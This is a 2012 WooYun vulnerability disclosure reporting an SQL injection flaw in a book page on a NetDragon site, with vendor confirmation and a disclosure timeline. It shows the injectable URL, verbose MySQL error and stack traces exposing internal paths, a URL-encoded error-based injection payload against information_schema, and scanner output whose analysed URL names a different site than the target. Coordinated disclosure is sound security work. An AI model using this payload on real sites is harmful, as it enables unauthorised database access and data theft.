当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-08361

漏洞标题:网龙某商场站存在注射漏洞

相关厂商:福建网龙

漏洞作者: zeracker

提交时间:2012-06-16 14:55

修复时间:2012-07-31 14:55

公开时间:2012-07-31 14:55

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-06-16: 细节已通知厂商并且等待厂商处理中
2012-06-18: 厂商已经确认,细节仅向厂商公开
2012-06-28: 细节向核心白帽子及相关领域专家公开
2012-07-08: 细节向普通白帽子公开
2012-07-18: 细节向实习白帽子公开
2012-07-31: 细节向公众公开

简要描述:

网龙某商场站存在注射漏洞
首先,恭喜网龙入驻乌云哈。
多年前还是玩过你们的游戏的,还是不错的!
昨天看到有注册,大致看了下,便有了下文。
昨晚不小心点到的。
囧。
不多说了。
你们数据库的表好乱
面对带头大哥压力大,面对猫哥的速度,压力大。

详细说明:

正常页面:
http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN


http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN’
“/”应用程序中的服务器错误。
SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN''    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 
异常详细信息: System.Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN''    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1
源错误: 
执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
堆栈跟踪: 
[Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN''    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''83JUNDGO9EQMUXTN''' at line 1]
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql, DbParameter[] Parameter) +281
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql) +7
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectTableImpl(Where where, OrderBy orderBy, String tableName) +493
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(Where where, OrderBy orderBy, Int32 SplitId) +89
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(String id, Int32 SplitId) +165
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id, Int32 SplitId) +263
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id) +45
   ND.BabyBook.FrontService.BookService.GetEntity(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Service\FrontService\BookService.cs:558
   ND.BabyBook.Web.Book.BookDetail.Bind(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:60
   ND.BabyBook.Web.Book.BookDetail.Page_Load(Object sender, EventArgs e) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:43
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
   System.Web.UI.Control.OnLoad(EventArgs e) +99
   System.Web.UI.Control.LoadRecursive() +50
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627
版本信息: Microsoft .NET Framework 版本:2.0.50727.3634; ASP.NET 版本:2.0.50727.3618



http://babybook.91.com/Book/BookDetail.aspx?id=83JUNDGO9EQMUXTN%27%20and%28select%201%20from%28select%20count%28*%29,concat%28%28select%20%28select%20%String_Col%%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%20%271%27=%271
“/”应用程序中的服务器错误。
SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1'    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1
说明: 执行当前 Web 请求期间,出现未处理的异常。请检查堆栈跟踪信息,以了解有关该错误以及代码中导致错误的出处的详细信息。 
异常详细信息: System.Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1'    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1
源错误: 
执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
堆栈跟踪: 
[Exception: SELECT * FROM `BIZ_BOOK` WHERE `BOOK_ID` = '83JUNDGO9EQMUXTN' and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1'    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x fro' at line 1]
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql, DbParameter[] Parameter) +281
   Yaohuasoft.Framework.Library2.YaohuaDatabase.SelectTable(String sql) +7
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectTableImpl(Where where, OrderBy orderBy, String tableName) +493
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(Where where, OrderBy orderBy, Int32 SplitId) +89
   Yaohuasoft.UAP.DAL2.BizBookDAL.SelectImpl(String id, Int32 SplitId) +165
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id, Int32 SplitId) +263
   Yaohuasoft.UAP.DAL2.BizBookDAL.Select(Int32 DbIndex, String id) +45
   ND.BabyBook.FrontService.BookService.GetEntity(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Service\FrontService\BookService.cs:558
   ND.BabyBook.Web.Book.BookDetail.Bind(String id) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:60
   ND.BabyBook.Web.Book.BookDetail.Page_Load(Object sender, EventArgs e) in E:\项目文件\幼儿教育\内网正常的babybook(最新版)\ND.BabyBook\ND.BabyBook.Web\Book\BookDetail.aspx.cs:43
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +14
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +35
   System.Web.UI.Control.OnLoad(EventArgs e) +99
   System.Web.UI.Control.LoadRecursive() +50
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +627


漏洞证明:

用工具上吧。
Analyzing http://sol.happigo.com/5107/chat/chat.php?c=1&s=1
Host IP: 222.247.56.101
Web Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.10
Powered-by: PHP/5.2.10
Current DB: babybook


修复方案:

因为贵司的业务比较大。
其他网站还没看,建议做一下全检。
大补小补的治标不治本。
QQ2036234

版权声明:转载请注明来源 zeracker@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2012-06-18 10:06

厂商回复:

感谢zeracker提供的漏洞

最新状态:

暂无

漏洞评价:

评论

  1. 2012-06-16 16:05 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    inner peace ... inner peace 哈哈

  2. 2012-06-16 16:11 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    @gainover 还没到这种境界